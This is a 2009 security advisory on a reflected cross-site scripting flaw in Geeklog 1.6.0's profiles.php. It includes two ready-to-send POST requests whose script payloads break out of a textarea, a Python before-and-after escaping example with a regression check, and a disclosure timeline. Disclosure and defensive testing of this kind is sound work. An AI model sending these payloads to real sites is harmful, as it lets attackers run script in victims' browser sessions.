Tuesday, July 28, 2009

Geeklog v.1.6.0 Cross-Site Scripting

Author: Gerendi Sandor Attila (http://gsasec.blogspot.com/)
Date: May 05, 2009
Package: Geeklog (1.6.0)
Product Homepage: http://www.geeklog.net/
Versions Affected: v.1.6.0 (Other versions may also be affected)
Severity: Medium

Input passed to the 'shortmsg' and 'message' POST parameters when posting to '/profiles.php' is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

Example 1:
POST /profiles.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 151

what=sendstory&from=x&fromemail=x&to=x&toemail=x&shortmsg=1</textarea><script>alert(1234)</script><textarea>&sid=welcome
will result in:
<td><textarea name="shortmsg" rows="8" style="width:100%">1</textarea><script>alert(1234)</script><textarea></textarea></td>


Example 2:
POST /profiles.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded

what=contact&author=x&authoremail=x&subject=x&message=1</textarea><script>alert(123)</script>&uid=2
will result in:
<td><textarea name="message" wrap="physical" rows="10" cols="50">1</textarea><script>alert(123)</script></textarea></td>
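As an added example (not Geeklog's own code), the unescaped reflection shown in the two examples next to an output-encoded rendering, with a parser-based check that can serve as a regression test; the sample values are constructed from the advisory's payloads and the template markup is simplified.

```python
import html
from html.parser import HTMLParser

# Constructed sample inputs modelled on the advisory's two examples
# (the 'shortmsg' and 'message' POST parameters of profiles.php).
SAMPLES = {
    "shortmsg": '1</textarea><script>alert(1234)</script><textarea>',
    "message": '1</textarea><script>alert(123)</script>',
}

def render_textarea_unsafe(name: str, value: str) -> str:
    """Reflects the value verbatim, as the vulnerable page did (the 'before')."""
    return f'<td><textarea name="{name}" rows="8">{value}</textarea></td>'

def render_textarea_safe(name: str, value: str) -> str:
    """Escapes '<', '>', '&' and quotes so the value cannot close the textarea."""
    return (f'<td><textarea name="{html.escape(name)}" rows="8">'
            f'{html.escape(value)}</textarea></td>')

class _TagCounter(HTMLParser):
    """Counts element start tags the way a browser's tokenizer would see them."""
    def __init__(self):
        super().__init__()
        self.counts = {}

    def handle_starttag(self, tag, attrs):
        self.counts[tag] = self.counts.get(tag, 0) + 1

def tag_counts(fragment: str) -> dict:
    """Parse an HTML fragment and return {tag: number_of_start_tags}."""
    p = _TagCounter()
    p.feed(fragment)
    p.close()
    return p.counts

def is_contained(fragment: str) -> bool:
    """True when user input stayed inside the textarea: exactly one textarea
    element and no script element appear after parsing."""
    c = tag_counts(fragment)
    return c.get("textarea", 0) == 1 and c.get("script", 0) == 0

if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(name, "unsafe contained:", is_contained(render_textarea_unsafe(name, value)))
        print(name, "safe contained:  ", is_contained(render_textarea_safe(name, value)))
```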


Status:
1. Contacted the author on July 28, 2009 via security e-mail.
2. The author promptly fixed the problem; see http://www.geeklog.net/article.php/geeklog-1.6.0sr1.
